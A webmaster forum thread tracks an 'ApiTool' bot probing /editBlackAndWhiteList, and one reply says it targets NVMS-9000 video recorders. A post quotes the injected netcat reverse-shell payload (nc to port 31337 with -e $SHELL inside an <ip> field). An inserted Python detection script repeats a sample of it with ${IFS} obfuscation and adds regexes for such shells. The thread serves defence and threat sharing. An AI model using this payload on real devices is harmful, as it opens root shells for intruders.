ApiTool

     
7:23 am on Oct 7, 2019 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2067
votes: 2


UA: ApiTool
URI: /editBlackAndWhiteList
Request Method: POST
ISPs: Mexico: axtel.net; San Jose, CA: spectrum.com

Info: Loads of "API Tool"-related search results so "ApiTool" could be anything from an exploit to a blooper -- but POST and the URI suggest exploit. No clue about the URI either, sorry. First seen yesterday and only twice.
10:19 pm on Oct 24, 2019 (gmt 0)

New User

joined:Oct 24, 2019
posts:1
votes: 0


exploit, looking for NVMS-9000-series no-name PVR type network-attached devices. payload contains the following shellcode in an attempt to gain root shell of the device ( ${IFS} replaced with spaces for clarity ).
<ip>$(nc xx.xxx.xx.xxx 31337 -e $SHELL&)</ip>

IP address in the shellcode is usually different from the originating IP, suggesting there's more than a rookie script kiddie behind this.

[edited by: engine at 11:27 am (utc) on Oct 26, 2019]
[edit reason] obfuscated ip [/edit]
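A defender-side way to spot this traffic in your own logs, covering both the request signature from the opening post (UA "ApiTool", POST to /editBlackAndWhiteList) and the body pattern described above (spaces hidden as ${IFS}, a $( ... ) command substitution wrapped in an <ip> element). This is an added example, not code posted by anyone in this thread; it assumes access logs in Apache/nginx "combined" format and that POST bodies are available separately (for example from a WAF or mod_security audit log). All log lines, IPs and the sample body below are constructed.

```python
"""Detection helper for the ApiTool / editBlackAndWhiteList probe (added example, not from the thread)."""
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines in combined format (documentation-range IPs, made-up sizes).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Oct/2019:03:14:07 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 196 "-" "ApiTool"
198.51.100.7 - - [25/Oct/2019:03:15:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Oct/2019:09:22:41 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 196 "-" "ApiTool"
"""

# Constructed POST body shaped like the one reported in the thread (IP is a placeholder).
SAMPLE_BODY = "<ip>$(nc${IFS}192.0.2.10${IFS}31337${IFS}-e${IFS}$SHELL&)</ip>"

# Combined log format: client, ident, user, time, request line, status, bytes, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken directly from the thread.
SUSPECT_UA = "ApiTool"
SUSPECT_URI = "/editBlackAndWhiteList"

# Body patterns: ${IFS} used as a whitespace substitute, and shell command substitution.
IFS_RE = re.compile(r"\$\{?IFS\}?")
CMD_SUBST_RE = re.compile(r"\$\([^)]*\)|`[^`]*`")
# netcat invoked with -e, which hands the connection to a program (the reverse-shell idiom).
NC_EXEC_RE = re.compile(r"\b(nc|netcat|ncat)\b.*\s-e\s")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_apitool_probe(entry: Dict[str, str]) -> bool:
    """True when either indicator from the thread is present; UA and URI are checked independently
    because the UA is trivial to change while the URI is what the tool is actually after."""
    return entry["ua"] == SUSPECT_UA or entry["uri"] == SUSPECT_URI


def find_probes(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed entries that match the probe signature."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_apitool_probe(entry):
            hits.append(entry)
    return hits


def inspect_body(body: str) -> Dict[str, object]:
    """Normalize ${IFS} to spaces, then report which injection indicators the body contains."""
    normalized = IFS_RE.sub(" ", body)
    findings: List[str] = []
    if IFS_RE.search(body):
        findings.append("ifs_whitespace_obfuscation")
    if CMD_SUBST_RE.search(normalized):
        findings.append("command_substitution")
    if NC_EXEC_RE.search(normalized):
        findings.append("netcat_reverse_shell")
    return {"normalized": normalized, "findings": findings}


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(f"probe from {hit['ip']} at {hit['time']}: {hit['method']} {hit['uri']} UA={hit['ua']!r}")
    report = inspect_body(SAMPLE_BODY)
    print("normalized body:", report["normalized"])
    print("findings:", ", ".join(report["findings"]) or "none")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; the IPs in the hits are what you would feed a firewall deny list, and the normalized body is what to match on in a WAF rule, since matching the raw ${IFS}-laden form misses trivial variants.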

11:51 pm on Oct 24, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10563
votes: 1123


@honeyandpot (kewl moniker!) Welcome to Webmasterworld!

The bad actors are everywhere and we need to stay alert!
5:52 am on Oct 26, 2019 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2067
votes: 2


Thanks for confirmation and info, and welcome, honeyandpot! I'm seeing this exploit three to four times a day now, always the exact same UA/URI/Request Method. A sprinkling of US IPs but most are elsewhere.
4:37 pm on Oct 26, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15934
votes: 887


I'm seeing this exploit three to four times a day now
Every time I read about a robot that I've never set eyes on, I get to wondering what triggers its arrival. Obviously not something basic like the presence of some standard CMS, since that kind of thing gets requested regardless. (Business with search engine tells me that around 1/3 of all websites [w3techs.com] use WP--though it certainly doesn't follow that 1/3 of all web traffic is to WP pages.)

Cursory research suggests that it really is a new robot, since everything with a visible date is from this month. (Cursory research also reveals that a heck of a lot of people's access logs somehow ended up in crawlable and hence indexable locations, suggesting a major ineptitude on the part of one or more hosts.) It doesn't look as if the URL is associated with any well-known CMS, so where are they getting it from? With different casing, it's the contact address for at least one British newspaper, but that's probably a red herring unless something sneaked into a script by mistake.
4:12 am on Oct 27, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10563
votes: 1123


Heh ... api can also be bogus "application program interface". (wink wink nudge nudge)